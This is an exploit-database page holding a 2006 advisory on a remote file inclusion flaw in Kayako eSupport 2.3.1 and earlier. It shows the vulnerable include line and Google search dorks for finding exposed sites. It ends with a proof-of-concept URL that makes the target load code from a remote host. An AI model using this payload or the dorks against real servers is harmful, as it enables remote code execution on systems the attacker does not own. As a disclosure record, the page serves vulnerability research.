Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability
# Published : 2006-08-02
# Author : beford
# Previous Title : TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit
# Next Title : TSEP <= 0.942 (colorswitch.php) Remote Inclusion Vulnerability

Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs. Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php

[code]
require_once $subd . "functions.php";
[/code]

Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.3.1%22
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.2%22

POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/?

# www.Syue.com [2006-08-02]